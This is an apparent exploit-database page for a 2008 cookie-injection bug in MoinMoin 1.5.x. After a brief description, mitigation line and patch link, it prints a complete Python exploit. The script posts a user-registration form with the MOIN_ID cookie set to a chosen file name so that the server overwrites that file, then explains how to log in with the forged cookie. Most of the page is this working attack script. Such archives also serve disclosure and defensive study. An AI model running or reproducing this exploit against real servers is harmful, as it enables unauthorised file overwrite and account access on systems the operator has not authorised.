header-logo
Suggest Exploit
vendor:
MoinMoin
by:
just a nonroot and colombian user
7.5
CVSS
HIGH
Cookie Injection
79
CWE
Product Name: MoinMoin
Affected Version From: MoinMoin 1.5.x
Affected Version To: MoinMoin 1.5.x
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Exploit for the MOIND_ID cookie Bug

This exploit allows an attacker to inject a malicious cookie into the MoinMoin 1.5.x web application. The malicious cookie can be used to overwrite a file on the server, allowing the attacker to gain access to the system. The exploit is coded in Python and requires the attacker to provide the URL of the MoinMoin application, the username, password, and email address of the user to be created, and the file to be overwritten.

Mitigation:

Ensure that the application is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
#Exploit for the MOIND_ID cookie Bug
# MoinMoin 1.5.x
#
#Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630
#
#Bug and exploit coded by just a nonroot and colombian user
#
#Enero 21 de 2008
#
#Greets: el directorio and all the SL community
#
# 
import urllib2,sys
print "MoinMoin host: i.e: http://127.0.0.1:8000/"
host=raw_input("MoinMoin host ( include http and /): ")
#info for the new user
#
#user for the test
user='nonroot'
#password for the test
password='nonrootuser'
#email for the test
email='just@nonrootuser.co'
#file to overwrite
#by default this file is there, is there?
archivo='README'
#######
#
req = urllib2.Request(host) 
adddata="action=userform&name="+user+"&aliasname=ilikecolombianpeople&password="+password+"&password2="+password+"&email="+email+"&css_url=&edit_rows=20&theme_name=modern&editor_default=text&editor_ui=freechoice&tz_offset=0&datetime_fmt=&language=&remember_me=1&show_fancy_diff=1&show_toolbar=1&show_page_trail=1&quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si&save=Save"
headers={'Cookie':'MOIN_ID='+archivo}
req = urllib2.Request(host+"UserPreferences/",adddata,headers) 
try:
	r = urllib2.urlopen(req)
	data=r.read()
except	urllib2.HTTPError:
	print "Wait a minute, is posible that the file: "+archivo+" doesn't have permission to write, think well, and try again"
	sys.exit(2)
print "Ok, the file: "+archivo+" was created, and you can logging setting the cookie MOIN_ID='"+archivo+"'"+" in your browser."
sys.exit(0)

# milw0rm.com [2008-01-21]

Navigation

Suggest Exploit

Services By CQR